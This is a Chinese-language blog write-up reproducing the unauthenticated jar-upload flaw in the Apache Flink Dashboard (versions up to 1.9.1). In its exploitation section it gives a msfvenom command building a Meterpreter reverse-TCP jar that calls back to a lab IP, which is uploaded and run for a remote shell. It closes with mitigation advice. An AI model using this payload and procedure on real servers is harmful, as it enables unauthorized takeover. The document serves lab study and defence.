Apache Flink 任意Jar包上传漏洞复现

目录

  • 漏洞背景
  • 漏洞描述
  • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议
  • 参考链接

漏洞背景

近日,有研究员公开了Apache Flink未授权上传jar包的安全风险,攻击者利用该隐患可在未经授权的情况下,上传包含恶意代码的jar包,从而控制目标服务器。

漏洞描述

Apache Flink是开源流处理框架,可用于对流数据进行分布式处理,在大数据领域中应用广泛。jar包上传属于Flink的正常业务功能,但是Flink的Dashboard在默认状态下无需认证即可访问,如果攻击者探测到目标存在Apache Flink Dashboard,利用该威胁可获取服务器权限。

影响版本

Apache Flink <=1.9.1
直至最新版本,均受影响

漏洞复现

环境搭建

下载即可

https://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压后进去bin目录下执行 start-cluster.sh
Apache Flink 任意Jar包上传漏洞复现_第1张图片
./start-cluster.sh
在这里插入图片描述
查看端口是否开启
在这里插入图片描述
pc机访问页面
Apache Flink 任意Jar包上传漏洞复现_第2张图片

漏洞利用

先生成一个jar包

msfvenom -p <“payload”> <“payload options”> -f <“format”>

msfvenom -p java/meterpreter/reverse_tcp LHOST 192.168.79.137 LPORT 8099 -f jar > king.jar

在这里插入图片描述
把jar包上传上去
Apache Flink 任意Jar包上传漏洞复现_第3张图片
到msf配置payload监听
在这里插入图片描述
Apache Flink 任意Jar包上传漏洞复现_第4张图片
配置好之后run去监听,这时候去上传的jar包点提交
Apache Flink 任意Jar包上传漏洞复现_第5张图片
可以看到可以反弹出来
Apache Flink 任意Jar包上传漏洞复现_第6张图片
也可以弹一个shell,可以使用的命令比较多
Apache Flink 任意Jar包上传漏洞复现_第7张图片

修复建议

个人建议:
1.禁止对公网开放flink或者为对flink的访问增加认证策略。
2.在内网中限制对flink Dashboard端口的访问。
3.官网出了补丁赶紧打补丁。

参考链接

https://mp.weixin.qq.com/s/HTFDYWlXfYe7fyGNJVwpSw

本文中提到的漏洞利用仅供研究学习使用,请遵守《网络安全法》等相关法律法规。

你可能感兴趣的:(web安全)